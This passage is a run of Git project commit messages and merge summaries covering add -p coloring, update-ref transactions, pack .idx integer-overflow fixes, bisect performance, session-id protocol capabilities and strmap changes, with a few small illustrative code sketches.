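const char *context_color(const struct config_entry *cfg, size_t n)
{
	const char *v = lookup(cfg, n, "color.diff.context");

	if (!v)
		v = lookup(cfg, n, "color.diff.plain");
	return v ? v : "";
}
```

Note that `.context` wins whenever it is set, regardless of where
`.plain` appears in the config.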
This still leads to inconsistencies when both config names are used: the
initial diff will be colored by the diff machinery. Once edited by a
user, a hunk has to be re-colored by `git add -p`, though, which would
then use the other setting to color the context lines.
In practice, this is not _all_ that bad. The `git config` manual says
this in the `color.diff.<slot>` entry:
`context` (context text - `plain` is a historical synonym)
We should therefore assume that users use either one or the other, but
not both names. Besides, it is relatively uncommon to look at a hunk
after editing it because it is immediately staged by default.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Both versions of `add -i` indent non-flat lists by five spaces. However,
when using color, the C version prints these spaces after the ANSI color
codes, whereas the Perl version prints them before the color codes.
Change the Perl version to match the C version to allow for introducing
a test that verifies that both versions produce the exact same output.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When copying the spaces used to indent non-flat lists in `git add -i`,
one space was appended by mistake. This makes the output of the built-in
version of `git add -i` inconsistent with the Perl version. Let's adjust
the built-in version to produce the same output as the Perl version.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The Perl version of this command colors the progress indicator and the
prompt message in one go.
Let's do the same in the built-in version so that the same upcoming test
(which will compare the output of `git add -p` against a known-good
version) will pass both for the Perl version as well as for the built-in
version.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the subsequent commit, it will become useful to keep track of which
metadata files were written by pack-objects. We already do this to an
extent with the 'exts' array, which only is used in the context of
existing packs.
Co-authored-by: Jeff King <peff@peff.net>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Fix the function name we give in the BUG message. It's "config", not
"choice".
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
parse_treeish_arg() uses dwim_ref() to set refname to a strdup'd string.
Release it after use. Also remove the const qualifier from the refname
member to signify that ownership of the string is handed to the struct,
leaving cleanup duty with the caller of parse_treeish_arg(), thus
avoiding a cast.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
do_diff_cache() builds a struct rev_info to hand to diff_cache() from
scratch by initializing it using repo_init_revisions() and then
replacing its diffopt and prune_data members.
The diffopt member is initialized to a heap-allocated list of options,
though. Release it using diff_setup_done() before overwriting it.
The initial value of the prune_data member doesn't need to be released,
but the copy created using copy_pathspec() does. Clear it after use.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It is currently possible to write multiple "start" commands into
git-update-ref(1) for a single session, but none of them except for the
first one actually have any effect.
Using such nested "start"s may eventually have a sensible effect. One
may imagine that it restarts the current transaction, effectively
emptying it and creating a new one. It may also allow for creation of
nested transactions. But currently, none of these are implemented.
Silently ignoring this misuse is making it hard to iterate in the future
if "start" is ever going to have meaningful semantics in such a context.
This commit thus makes sure to error out in case we see such use.
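The intended rule can be modeled as a two-state machine. This is a
minimal sketch under the assumption that a session is either inside an
explicit transaction or not; enum txn_state, handle_start() and
handle_finish() are hypothetical names and do not mirror the actual
update-ref code.

```c
/* Hypothetical session state: is an explicit transaction open? */
enum txn_state {
	TXN_CLOSED,
	TXN_OPEN
};

/*
 * "start": open a new transaction. Return -1 if one is already open,
 * instead of silently ignoring the nested "start".
 */
int handle_start(enum txn_state *state)
{
	if (*state == TXN_OPEN)
		return -1;
	*state = TXN_OPEN;
	return 0;
}

/*
 * "commit" or "abort": close the current transaction so that a later
 * "start" may open a fresh one. (Simplified: no ref updates happen.)
 */
void handle_finish(enum txn_state *state)
{
	*state = TXN_CLOSED;
}
```

A second "start" is rejected only while a transaction is open; after a
"commit" or "abort" it is accepted again.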
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Reviewed-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In commit 0a0fbbe3ff (refs: remove lookup cache for
reference-transaction hook, 2020-08-25), a new benchmark was added to
p1400 which has the intention to exercise creation of multiple
transactions in a single process. As git-update-ref wasn't yet able to
create multiple transactions with a single run we instead used git-push.
As its non-atomic version creates a transaction per reference update,
this was the best approximation we could make at that point in time.
Now that `git-update-ref --stdin` supports creation of multiple
transactions, let's convert the benchmark to use that instead. It has
less overhead and it's also a lot clearer what the actual intention is.
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Reviewed-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
While git-update-ref has recently grown commands which allow interactive
control of transactions in e48cf33b61 (update-ref: implement interactive
transaction handling, 2020-04-02), it is not yet possible to create
multiple transactions in a single session. To do so, one currently still
needs to invoke the executable multiple times.
This commit addresses this shortcoming by allowing the "start" command
to create a new transaction if the current transaction has already been
either committed or aborted.
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Reviewed-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The testcase t1400 exercises the git-update-ref(1) utility. To do so,
many tests directly read and write references via the filesystem,
assuming that we always use loose and/or packed references. While this
is true now, it'll change with the introduction of the reftable backend.
Convert those tests to use git-update-ref(1) and git-show-ref(1) where
possible. Furthermore, two tests are converted to not delete HEAD
anymore, as this results in a broken repository. They've instead been
updated to create a non-mandatory symbolic reference and delete that
one instead.
Some tests remain which exercise behaviour with broken references, which
cannot currently be converted to use regular git tooling.
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Reviewed-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In load_idx(), we check that the .idx file is sized appropriately for
the number of objects it claims to have. We recently fixed the case
where the number of objects caused our expected size to overflow a
32-bit unsigned int, and we switched to size_t.
On a 64-bit system, this is fine; our size_t covers any expected size.
On a 32-bit system, though, it won't. The file may claim to have 2^31
objects, which will overflow even a size_t.
This doesn't hurt us at all for a well-formed idx file. A 32-bit system
would already have failed to mmap such a file, since it would be too
big. But an .idx file which _claims_ to have 2^31 objects but is
actually much smaller would fool our check.
This is a broken file, and for the most part we don't care that much
what happens. But:
- it's a little friendlier to notice up front "woah, this file is
broken" than it is to get nonsense results
- later access of the data assumes that the loading function
sanity-checked that we have at least enough bytes for the regular
object-id table. A malformed .idx file could lead to an
out-of-bounds read.
So let's use our overflow-checking functions to make sure that we're not
fooled by a malformed file.
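As an illustration of the idea (not the helpers Git itself uses), the
size computation can be built from checked operations that report
overflow instead of wrapping. The names checked_mul(), checked_add() and
idx_min_size() are hypothetical; the layout constants follow the v2 .idx
minimum-size formula of header, fan-out table, per-object entries and
two trailing hashes.

```c
#include <stddef.h>
#include <stdint.h>

/* Store a * b in *out; return -1 instead of wrapping on overflow. */
int checked_mul(size_t a, size_t b, size_t *out)
{
	if (b && a > SIZE_MAX / b)
		return -1;
	*out = a * b;
	return 0;
}

/* Store a + b in *out; return -1 instead of wrapping on overflow. */
int checked_add(size_t a, size_t b, size_t *out)
{
	if (a > SIZE_MAX - b)
		return -1;
	*out = a + b;
	return 0;
}

/*
 * Minimum size of a v2 .idx claiming `nr` objects:
 * 8 + 4*256 + nr*(hashsz + 4 + 4) + hashsz + hashsz.
 * Returns -1 if the claimed object count cannot be represented.
 */
int idx_min_size(size_t nr, size_t hashsz, size_t *out)
{
	size_t per_object, table, fixed;

	if (checked_add(hashsz, 4 + 4, &per_object) ||
	    checked_mul(nr, per_object, &table) ||
	    checked_add(8 + 4 * 256, hashsz, &fixed) ||
	    checked_add(fixed, hashsz, &fixed) ||
	    checked_add(fixed, table, out))
		return -1;
	return 0;
}
```

A file whose claimed object count makes idx_min_size() fail can be
rejected up front, before any comparison against the mapped size.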
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The block-sha1 implementation takes an "unsigned long" for the length of
a buffer to hash, but our hash algorithm wrappers take a size_t, as do
other implementations we support like openssl or sha1dc. On many
systems, including Linux, these two are equivalent, but they are not on
Windows (where only a "long long" is 64 bits). As a result, passing
large chunks to a single the_hash_algo->update_fn() would produce wrong
answers there.
Note that we don't need to update any other sizes outside of the
function interface. We store the cumulative size in a "long long" (which
we must do since we hash things bigger than 4GB, like packfiles, even on
32-bit platforms). And internally, we break that size_t len down into
64-byte blocks to feed into the guts of the algorithm.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When checking the trailing checksum hash of a .idx file, we pass the
whole buffer (minus the trailing hash) into a single call to
the_hash_algo->update_fn(). But we cast it to an "unsigned int". This
comes from c4001d92be (Use off_t when we really mean a file offset.,
2007-03-06). That commit started storing the index_size variable as an
off_t, but our mozilla-sha1 implementation from the time was limited to
a smaller size. Presumably the cast was a way of annotating that we
expected .idx files to be small, and so we didn't need to loop (as we do
for arbitrarily-large .pack files). Though as an aside it was still
wrong, because the mozilla function actually took a signed int.
These days our hash-update functions are defined to take a size_t, so we
can pass the whole buffer in directly. The cast is actually causing a
buggy truncation!
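A minimal sketch of that truncation, using uint32_t as a stand-in for a
32-bit "unsigned int" and uint64_t for a 64-bit size_t (both widths are
assumptions about the platform; len_after_cast() is a hypothetical
name):

```c
#include <stdint.h>

/*
 * Model of the old call site: the buffer length is cast to a 32-bit
 * type before being handed to the hash-update function, so only the
 * low 32 bits of the length survive.
 */
uint64_t len_after_cast(uint64_t len)
{
	return (uint32_t)len;
}
```

For a buffer of 4GB plus 5 bytes, only 5 bytes would be hashed.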
While we're here, though, let's drop the confusing off_t variable in the
first place. We're getting the size not from the filesystem anyway, but
from p->index_size, which is a size_t. In fact, we can make the code a
bit more readable by dropping our local variable duplicating
p->index_size, and instead have one that stores the size of the actual
index data, minus the trailing hash.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We sometimes store the offset into a pack .idx file as an "unsigned
long", but the mmap'd size of a pack .idx file can exceed 4GB. An
"unsigned long" is sufficient on LP64 systems like Linux, but is too
small on LLP64 systems like Windows, where it is still only 32 bits.
Let's use size_t, which is a better type for an offset into a memory
buffer.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A pack and its matching .idx file are limited to 2^32 objects, because
the pack format contains a 32-bit field to store the number of objects.
Hence we use uint32_t in the code.
But the byte count of even a .idx file can be much larger than that,
because it stores at least a hash and an offset for each object. So
using SHA-1, a v2 .idx file will cross the 4GB boundary at 153,391,650
objects. This confuses load_idx(), which computes the minimum size like
this:
unsigned long min_size = 8 + 4*256 + nr*(hashsz + 4 + 4) + hashsz + hashsz;
Even though min_size will be big enough on most 64-bit platforms, the
actual arithmetic is done as a uint32_t, resulting in a truncation. We
actually exceed that min_size, but then we do:
unsigned long max_size = min_size;
if (nr)
max_size += (nr - 1)*8;
to account for the variable-sized table. That computation doesn't
overflow quite so low, but with the truncation for min_size, we end up
with a max_size that is much smaller than our actual size. So we
complain that the idx is invalid, and can't find any of its objects.
We can fix this case by casting "nr" to a size_t, which will do the
multiplication in 64-bits (assuming you're on a 64-bit platform; this
will never work on a 32-bit system since we couldn't map the whole .idx
anyway). Likewise, we don't have to worry about further additions,
because adding a smaller number to a size_t will convert the other side
to a size_t.
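The difference can be reproduced in isolation. In this sketch uint64_t
stands in for a 64-bit size_t, and the result of the uncast expression
is stored in a uint32_t to pin down the 32-bit width that the arithmetic
has on common platforms; min_size_narrow() and min_size_wide() are
hypothetical names.

```c
#include <stdint.h>

/* The whole expression is evaluated in 32 bits and wraps past 4GB. */
uint64_t min_size_narrow(uint32_t nr, uint32_t hashsz)
{
	uint32_t bytes = 8 + 4 * 256 + nr * (hashsz + 4 + 4) + hashsz + hashsz;

	return bytes;
}

/* Casting "nr" first makes the multiplication, and then every
 * addition, happen in 64 bits. */
uint64_t min_size_wide(uint32_t nr, uint32_t hashsz)
{
	return 8 + 4 * 256 + (uint64_t)nr * (hashsz + 4 + 4) + hashsz + hashsz;
}
```

With a 20-byte hash, both functions agree up to 153,391,650 objects; for
153,725,110 objects the wide version yields 4,304,304,152 bytes while
the narrow one wraps around to 9,336,856.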
A few notes:
- obviously we could just declare "nr" as a size_t in the first place
(and likewise, packed_git.num_objects). But it's conceptually a
uint32_t because of the on-disk format, and we correctly treat it
that way in other contexts that don't need to compute byte offsets
(e.g., iterating over the set of objects should and generally does
use a uint32_t). Switching to size_t would make all of those other
cases look wrong.
- it could be argued that the proper type is off_t to represent the
file offset. But in practice the .idx file must fit within memory,
because we mmap the whole thing. And the rest of the code (including
the idx_size variable we're comparing against) uses size_t.
- we'll add the same cast to the max_size arithmetic line. Even though
we're adding to a larger type, which will convert our result, the
multiplication is still done as a 32-bit value and can itself
overflow. I didn't check this with my test case, since it would need
an even larger pack (~530M objects), but looking at compiler output
shows that it works this way. The standard should agree, but I
couldn't find anything explicit in 6.3.1.8 ("usual arithmetic
conversions").
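The last note can be checked with a small sketch. Again uint64_t stands
in for a 64-bit size_t, and the explicit uint32_t cast in the narrow
variant only pins down the width that the uncast sub-expression has on
common platforms; both function names are hypothetical.

```c
#include <stdint.h>

/* (nr - 1) * 8 wraps in 32 bits before it is added to the wide sum. */
uint64_t max_size_narrow(uint64_t min_size, uint32_t nr)
{
	uint64_t max_size = min_size;

	if (nr)
		max_size += (uint32_t)((nr - 1) * 8);
	return max_size;
}

/* With the cast, the multiplication itself is done in 64 bits. */
uint64_t max_size_wide(uint64_t min_size, uint32_t nr)
{
	uint64_t max_size = min_size;

	if (nr)
		max_size += (uint64_t)(nr - 1) * 8;
	return max_size;
}
```

For nr = 536,870,913 the narrow variant adds nothing at all, because
(nr - 1) * 8 is exactly 2^32 and wraps to zero.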
The case in load_idx() was the most immediate one that I was able to
trigger. After fixing it, looking up actual objects (including the very
last one in sha1 order) works in a test repo with 153,725,110 objects.
That's because bsearch_hash() works with uint32_t entry indices, and the
actual byte access:
int cmp = hashcmp(table + mi * stride, sha1);
is done with "stride" as a size_t, causing the uint32_t "mi" to be
promoted to a size_t. This is the way most code will access the index
data.
However, I audited all of the other byte-wise accesses of
packed_git.index_data, and many of the others are suspect (they are
similar to the max_size one, where we are adding to a properly sized
offset or directly to a pointer, but the multiplication in the
sub-expression can overflow). I didn't trigger any of these in practice,
but I believe they're potential problems, and certainly adding in the
cast is not going to hurt anything here.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The previous two commits removed the last use of a function in this
library, but most of it had been dead code for a while[1][2]. Only the
"get_default_remote" function was still being used.
Even though we had a manual page for this library, it was never
intended to be (nor, I expect, actually) used outside of git.git. Let's
just remove it; if anyone still cares about a function here, they can
pull it into their own project[3].
1. Last use of error_on_missing_default_upstream():
d03ebd411c ("rebase: remove the rebase.useBuiltin setting",
2019-03-18)
2. Last use of get_remote_merge_branch(): 49eb8d39c7 ("Remove
contrib/examples/*", 2018-03-25)
3. https://lore.kernel.org/git/87a6vmhdka.fsf@evledraar.gmail.com/
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove the now-redundant "get_default_remote" function by converting
its last user to the "print-default-remote" helper.
As can be seen in 13424764db ("submodule: port submodule subcommand
'sync' from shell to C", 2018-01-15) this helper is already used
internally by the C code for submodule remote name discovery.
The "get_default_remote" function in "git-parse-remote.sh" will be
removed in a follow-up change.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Replace a use of the get_default_remote() function with an invocation
of "git fetch".
The "fetch" command already has logic to discover the remote for the
current branch. However, before it learned to accept a custom
refspec *and* use its idea of the default remote, it wasn't possible
to get rid of some equivalent of the "get_default_remote" invocation
here.
As it turns out, the recently added "--stdin" option to fetch[1] gives
us a way to do that. Let's use it instead.
While I'm at it simplify the "fetch_in_submodule" function. It wasn't
necessary to pass "$@" to "fetch" since we'd only ever provide one
SHA-1 as an argument in the previous "*" codepath (in addition to
"--depth=N"). Rewrite the function to more narrowly reflect its
use-case.
1. https://lore.kernel.org/git/87eekwf87n.fsf@evledraar.gmail.com/
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 't5310-pack-bitmaps.sh' two tests make sure that our pack bitmaps
are compatible with JGit's bitmaps. Alas, not even the most recent
JGit version (5.9.0.202009080501-r) supports SHA256 yet, so when this
test script is run with GIT_TEST_DEFAULT_HASH=sha256 on a setup with
JGit installed in PATH, then these two tests fail.
Protect these two tests with the SHA1 prereq in order to skip them
when testing with SHA256.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A regression has been introduced by a62387b (submodule.c: fetch in
submodules git directory instead of in worktree, 2018-11-28).
The scenario in which it triggers is when one has a remote repository
with a subrepository inside a subrepository like this:
superproject/middle_repo/inner_repo
Persons A and B both have a clone of it, but person B is not working
with the inner_repo and thus does not have it initialized in their
working copy.
Now person A introduces a change to the inner_repo and propagates it
through the middle_repo and the superproject.
Once person A has pushed the changes and person B wants to fetch them
using "git fetch" at the superproject level, B's git call will fail with
an error saying:
Could not access submodule 'inner_repo'
Errors during submodule fetch:
middle_repo
The expectation is that in this case the inner submodule will be
recognized as an uninitialized subrepository and skipped by the git
fetch command.
This used to work correctly before 'a62387b (submodule.c: fetch in
submodules git directory instead of in worktree, 2018-11-28)'.
Starting with a62387b the code evaluates "is_empty_dir()" inside
.git/modules for a directory that exists only in the worktree, which of
course yields the wrong return value.
This patch reverts the changes of a62387b and introduces a regression
test.
Signed-off-by: Peter Kaestle <peter.kaestle@nokia.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Call hashwrite_be64() to write a 64-bit value instead of open-coding it
using htonl() and hashwrite(). This shortens the code, gets rid of a
buffer and several magic numbers, and makes the intent clearer.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Call hashwrite_be64() to write 64-bit values instead of open-coding it
using hashwrite_be32() and sizeof. This shortens the code and makes its
intent clearer.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a helper function for hashing and writing 64-bit integers in network
byte order. It returns the number of written bytes. This simplifies
callers that keep track of the file offset, even though this number is a
constant.
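As a rough illustration of the idea (a Python sketch, not the C helper
itself; the name write_be64 and its arguments are made up for this
example), hashing and writing a 64-bit value in network byte order and
returning the byte count could look like this:

```python
import hashlib
import io
import struct


def write_be64(out, hasher, value):
    """Hash and write `value` as an unsigned 64-bit big-endian integer.

    Hypothetical stand-in for the helper described above; returns the
    number of bytes written so callers can advance their file offset.
    """
    data = struct.pack(">Q", value)  # ">Q": big-endian unsigned 64-bit
    hasher.update(data)
    out.write(data)
    return len(data)


buf = io.BytesIO()
sha = hashlib.sha1()
offset = 0
offset += write_be64(buf, sha, 0x0102030405060708)
```

A caller that tracks the file offset can add the return value directly
instead of repeating a magic number.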
Suggested-by: Derrick Stolee <dstolee@microsoft.com>
Original-patch-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'git bisect start ...' and subsequent 'git bisect (good|bad)' commands
can take quite a while when the given/remaining revision range between
good and bad commits is big and contains a lot of merge commits, e.g.
in git.git:
$ git rev-list --count v1.6.0..v2.28.0
44284
$ time git bisect start v2.28.0 v1.6.0
Bisecting: 22141 revisions left to test after this (roughly 15 steps)
[e197c21807] unable_to_lock_die(): rename function from unable_to_lock_index_die()
real 0m15.472s
user 0m15.220s
sys 0m0.255s
The majority of the runtime is spent in do_find_bisection(), where we
try to find a commit as close as possible to the halfway point between
the bad and good revisions, i.e. a commit from which the number of
reachable commits that are in the good-bad range is half the total
number of commits in that range. So we count how many commits are
reachable in the good-bad range for each commit in that range, which
is quick and easy for a linear history: even over 300k commits in a
linear range are handled in ~0.3s on my machine. Alas, handling merge
commits is non-trivial and quite expensive as the algorithm used seems
to be quadratic, causing the long runtime shown above.
Interestingly, look at what a big difference one additional commit
can make:
$ git rev-list --count v1.6.0^..v2.28.0
44285
$ time git bisect start v2.28.0 v1.6.0^
Bisecting: 22142 revisions left to test after this (roughly 15 steps)
[565301e416] Sync with 2.1.2
real 0m5.848s
user 0m5.600s
sys 0m0.252s
The difference is caused by one of the optimizations attempting to cut
down the runtime added in 1c4fea3a40 (git-rev-list --bisect:
optimization, 2007-03-21):
Another small optimization is whenever we find a half-way commit
(that is, a commit that can reach exactly half of the commits),
we stop giving counts to remaining commits, as we will not find
any better commit than we just found.
In this second 'git bisect start' command we happen to find a commit
exactly at the halfway point and can return early, but in the first
case there is no such commit, so we can't return early and end up
counting the number of reachable commits from all commits in the
good-bad range.
However, when we have thousands of commits it's not all that important
to find the _exact_ halfway point; a few commits more or less don't
make any real difference for the bisection.
So let's loosen the check in the halfway() helper to consider commits
within about 0.1% of the exact halfway point as halfway as well, and
rename the function to approx_halfway() accordingly. This will allow
us to return early on a bigger good-bad range, even when there is no
commit exactly at the halfway point, thereby reducing the runtime of
the first command above considerably, from ~15s to 4.901s.
Furthermore, even if there is a commit exactly at the halfway point,
we might still stumble upon a commit within that 0.1% range before
finding the exact halfway point, allowing us to return a bit earlier,
slightly reducing the runtime of the second command from 5.848s to
5.058s. Note that this change doesn't affect good-bad ranges
containing ~2000 commits or less, because that 0.1% tolerance becomes
zero due to integer arithmetic; however, if the range is that small
then counting the reachable commits for all commits is already fast
enough anyway.
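The loosened check can be sketched as follows. This is an illustrative
Python model, not the C code: the "nr // 1024" tolerance is an
assumption picked to approximate "about 0.1%" with integer arithmetic,
and "weight" stands for the number of commits in the good-bad range
that are reachable from the candidate commit.

```python
def approx_halfway(weight, nr):
    """Return True if `weight` is close enough to half of `nr`."""
    diff = 2 * weight - nr
    # Exact halfway for any range size: 2 and 3 are halfway of 5,
    # 3 is halfway of 6.
    if -1 <= diff <= 1:
        return True
    # Loosened check for big ranges. For small ranges the integer
    # division rounds the tolerance down so far that nothing beyond
    # the exact check above can match.
    return abs(diff) < nr // 1024
```

Under this assumed tolerance, a range of 10000 commits accepts weights
4996 through 5004 as halfway, while a range of 1000 commits still
accepts only the exact halfway point.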
Naturally, this will likely change which commits get picked at each
bisection step, and, in turn, might change how many bisection steps
are necessary to find the first bad commit. If the number of
necessary bisection steps were to increase often, then this change
could backfire, because building and testing at each step might take
much longer than the time spared. OTOH, if the number of steps were
to decrease, then it would be a double win.
So I ran some tests to see how often that happens: picked random good
and bad starting revisions at least 50k commits apart and a random
first bad commit in between in git.git, and used 'git bisect run git
merge-base --is-ancestor HEAD $first_bad_commit' to check the number
of necessary bisection steps. After repeating all this 1000 times
both with and without this patch I found that:
- 146 cases needed one more bisection step than before, 149 cases
needed one less step, while in the remaining 705 cases the number
of steps didn't change. So the number of bisection steps does
indeed change in a non-negligible number of cases, but it seems
that the average number of steps doesn't change in the long run.
- The first 'git bisect start' command got over 3x faster in 456
cases, so this "no commit at the exact halfway point" case seems
to be common enough to care about.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When receive-pack receives a session-id capability from the client, log
the received session ID via a trace2 data event.
Signed-off-by: Josh Steadmon <steadmon@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When the server sent a session-id capability and transfer.advertiseSID
is true, advertise send-pack's own session ID back to the server.
Signed-off-by: Josh Steadmon <steadmon@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When upload-pack (protocol v0/v1) or a protocol v2 server receives a
session-id capability from a client, log the received session ID via a
trace2 data event.
Signed-off-by: Josh Steadmon <steadmon@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When the server sent a session-id capability and transfer.advertiseSID
is true, advertise fetch-pack's own session ID back to the server.
Signed-off-by: Josh Steadmon <steadmon@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When a client receives a session-id capability from a protocol v0, v1,
or v2 server, log the received session ID via a trace2 data event.
Signed-off-by: Josh Steadmon <steadmon@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When transfer.advertiseSID is true, advertise the server's session ID
for all protocol v2 connections via the new session-id capability.
Signed-off-by: Josh Steadmon <steadmon@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When transfer.advertiseSID is true, advertise receive-pack's session ID
via the new session-id capability.
Signed-off-by: Josh Steadmon <steadmon@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When transfer.advertiseSID is true, advertise upload-pack's session ID
via the new session-id capability.
Signed-off-by: Josh Steadmon <steadmon@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a public wrapper, trace2_session_id(), around tr2_sid_get(), which
is intended to be private to the trace2 implementation.
Signed-off-by: Josh Steadmon <steadmon@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Document a new config option that allows users to determine whether or
not to advertise their session IDs to remote Git clients and servers.
Signed-off-by: Josh Steadmon <steadmon@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In future patches, we will add the ability for Git servers and clients
to advertise unique session IDs via protocol capabilities. This
allows for easier debugging when both client and server logs are
available.
Signed-off-by: Josh Steadmon <steadmon@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Recently the format of an internal state file "rebase -i" uses has
been tightened up for consistency, which would hurt those who start
"rebase -i" with old git and then continue with new git. Loosen
the reader side a bit (which we may want to tighten again in a year
or so).
* jc/sequencer-stopped-sha-simplify:
sequencer: tolerate abbreviated stopped-sha file
Test code clean-up.
* js/test-whitespace-fixes:
t9603: use tabs for indentation
t5570: remove trailing padding
t5400,t5402: consistently indent with tabs, not with spaces
t3427: adjust stale comment
t3406: indent with tabs, not spaces
t1004: insert missing "branch" in a message
The documentation on the "--abbrev=<n>" option did not say the
output may be longer than "<n>" hexdigits, which has been
clarified.
* jc/abbrev-doc:
doc: clarify that --abbrev=<n> is about the minimum length
In 83bbf9b92e (mergetool--lib: improve support for vimdiff-style tool
variants, 2020-07-29), we introduced a `list_tool_variants` function
in the spirit of Postel's Law: be lenient in what you accept as input.
In this particular instance, we wanted to allow not only `bc` but also
`bc3` as name for the Beyond Compare tool.
However, what this patch overlooked is that it is totally allowed for
users to override the defaults in `mergetools/`. But now that we strip
off trailing digits, the name that the user gave the tool might not
actually be in the list produced by `list_tool_variants`.
So let's do the same as for the `diff_cmd` and the `merge_cmd`: override
it with the trivial version in case a user-defined setup was detected.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As of 83bbf9b92e (mergetool--lib: improve support for vimdiff-style
tool variants, 2020-07-29), we already list `bc` and `bc3` as aliases
for that mergetool/difftool.
However, the current Beyond Compare version is _4_, therefore the `bc4`
alias is missing from that list.
Most notably, this is the root cause of the breakage reported in
https://github.com/git-for-windows/git/issues/2893 where a
well-configured `bc4` difftool stopped working as of v2.29.0:
`setup_tool` would notice that after stripping off the trailing digit,
it finds a match in `mergetools/` (the `bc` file), source it, and then
the alias would not match the list offered by the `list_tool_variants`
function, and simply exit without doing anything, but pretending
success.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
* en/strmap:
shortlog: use strset from strmap.h
Use new HASHMAP_INIT macro to simplify hashmap initialization
strmap: take advantage of FLEXPTR_ALLOC_STR when relevant
strmap: enable allocations to come from a mem_pool
strmap: add a strset sub-type
strmap: split create_entry() out of strmap_put()
strmap: add functions facilitating use as a string->int map
strmap: enable faster clearing and reusing of strmaps
strmap: add more utility functions
strmap: new utility functions
hashmap: provide deallocation function names
hashmap: introduce a new hashmap_partial_clear()
hashmap: allow re-use after hashmap_free()
hashmap: adjust spacing to fix argument alignment
hashmap: add usage documentation explaining hashmap_free[_entries]()
Now that hashmap has lazy initialization and a HASHMAP_INIT macro,
hashmaps allocated on the stack can be initialized without a call to
hashmap_init(), which in some cases makes the code a bit shorter.
Convert some callsites over to take advantage of this.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
By default, we do not use a mempool and strdup_strings is true; in this
case, we can avoid both an extra allocation and an extra free by just
over-allocating for the strmap_entry leaving enough space at the end to
copy the key. FLEXPTR_ALLOC_STR exists for exactly this purpose, so
make use of it.
Also, adjust the case when we are using a memory pool and strdup_strings
is true to just do one allocation from the memory pool instead of two so
that the strmap_clear() and strmap_remove() code can just avoid freeing
the key in all cases.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
For heavy users of strmaps, allowing the keys and entries to be
allocated from a memory pool can provide significant overhead savings.
Add an option to strmap_init_with_options() to specify a memory pool.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the version negotiation phase between "receive-pack" and
"proc-receive", "proc-receive" can send an empty flush-pkt to end the
negotiation and use default version 0. Capabilities (such as
"push-options") are not supported in version 0.
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
